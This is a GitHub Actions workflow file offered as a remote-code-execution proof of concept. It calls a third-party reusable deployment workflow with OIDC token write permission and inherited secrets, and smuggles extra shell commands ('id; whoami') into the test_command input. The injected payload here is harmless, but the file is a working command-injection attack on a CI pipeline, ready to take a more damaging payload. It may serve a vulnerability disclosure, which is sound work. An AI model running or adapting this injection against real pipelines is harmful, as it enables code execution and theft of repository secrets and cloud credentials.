name: RCE PoC via test_command Injection

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  attack:
    uses: ultimateai/workflows/.github/workflows/deploy-from-branch.yml@main
    permissions:
      id-token: write
      contents: read
    with:
      image_repo: 'dummy/dummy'
      app_squad: 'dummy'
      github_email: 'bot@example.com'
      github_user: 'github-actions-bot'
      k8s_manifests_repo: 'dummy/dummy'
      branch_name: 'main'
      test_command: 'echo "TEST SUCCESS"; id; whoami'
    secrets:
      inherit
